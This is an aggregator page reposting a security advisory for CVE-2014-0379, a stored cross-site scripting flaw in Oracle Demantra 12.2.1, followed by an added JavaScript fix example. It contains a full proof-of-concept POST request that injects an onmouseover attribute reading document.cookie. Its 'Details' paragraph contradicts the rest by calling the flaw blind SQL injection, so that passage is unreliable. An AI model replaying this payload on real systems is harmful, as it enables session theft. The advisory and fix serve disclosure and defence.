Oracle Demantra 12.2.1 Stored Cross Site Scripting

Published 02 Mar 2014 00:00:00. Reported by Oliver Gruskovnjak. Type: packetstorm. Source: packetstormsecurity.com

Stored Cross-site Scripting in Oracle Demantra 12.2.1, potential for data extraction and modification.

Related:

- 0day.today: Oracle Demantra 12.2.1 - Stored XSS Vulnerability (1 Mar 2014)
- Circl: CVE-2014-0379 (1 Mar 2014)
- CVE: CVE-2014-0379 (15 Jan 2014)
- Cvelist: CVE-2014-0379 (15 Jan 2014)
- NVD: CVE-2014-0379 (15 Jan 2014)
- Oracle: Oracle Critical Patch Update - January 2014 (14 Jan 2014)
- Prion: Buffer overflow (15 Jan 2014)
- securityvulns: Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities (5 May 2014)
- ThreatPost: Four Oracle Demantra Security Vulnerabilities Found (3 Mar 2014)

`Vulnerability title: Stored Cross-site Scripting in Oracle Demantra  
CVE: CVE-2014-0379  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The Oracle Demantra application is vulnerable to SQL injection.  
  
An attacker with access to the vulnerable pages could manipulate the  
queries being sent to the database, potentially enabling them to extract  
sensitive information or modify content within the application.  
  
In this particular instance, exploitation was more difficult as the  
results of the attack had to be inferred based on the pages returned, often  
referred to as "blind" SQL Injection.  
  
Exploit:  
  
Request:  
  
POST /demantra/TaskSender HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291  
Content-Length: 3093  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUsersVector"  
  
389  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUserList"  
  
389;  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="message"  
  
asdasda  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="description"  
  
asdasdasdas  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="url"  
  
aaa"onmouseover="alert(document.cookie)  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmail"  
  
1  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="combination"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="tkn"  
  
187120466014305  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedDueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedAlertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmailCheckbox"  
  
on  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="x"  
  
50  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="y"  
  
7  
-----------------------------12454397315614820331578362291--  
  
Resulting Code in page:  
  
<!-- Message -->  
  
<td class="columnCellMessage">  
  
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">  
  
<b>asdasda</b>  
  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0379/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
`
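The "Resulting Code in page" shows the root cause: the submitted `url` value is concatenated into an `href` attribute, so a double quote in it closes the attribute and whatever follows becomes a new attribute. The added example below (not part of the advisory or of Demantra's own code) models that rendering and a hardened version; `renderTaskLink`, `safeTaskLink`, `normalizeTaskUrl` and `escapeHtml` are hypothetical names, and the sample value is the one from the advisory's request.

```javascript
// Constructed sample input: the "url" and "message" fields from the
// advisory's TaskSender request.
const SAMPLE_URL = 'aaa"onmouseover="alert(document.cookie)';
const SAMPLE_MSG = 'asdasda';

// Mimics the vulnerable template: raw concatenation into the href
// attribute, reproducing the markup shown under "Resulting Code in page".
function renderTaskLink(url, message, id) {
  return `<a href="http://${url}" id="${id}" class="message" target="_blank">` +
         `<b>${message}</b></a>`;
}

// Context-aware escaping for HTML attribute values and element text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Validates the task URL as a URL rather than as a string: only http(s),
// and a hostname made of plain DNS characters. Returns null on anything else.
function normalizeTaskUrl(url) {
  const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(url);
  let parsed;
  try {
    parsed = new URL(hasScheme ? url : `http://${url}`);
  } catch {
    return null;                                   // unparsable input
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  if (!/^[a-z0-9.-]+$/i.test(parsed.hostname)) return null;
  return parsed.href;
}

// Hardened rendering: validate the URL, escape every interpolated value,
// and drop the link entirely (keeping the escaped message) when the URL
// does not validate.
function safeTaskLink(url, message, id) {
  const href = normalizeTaskUrl(url);
  const text = `<b>${escapeHtml(message)}</b>`;
  if (href === null) return text;
  return `<a href="${escapeHtml(href)}" id="${escapeHtml(id)}" class="message" target="_blank">` +
         `${text}</a>`;
}
```

For a stored field like this one, validation belongs at the write (the `TaskSender` handler) and escaping at every read (each JSP that renders the task), since the value may be displayed in more than one page.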


02 Mar 2014 00:00 (current). Vulners AI Score: 6.6 (medium risk). EPSS: 0.36094.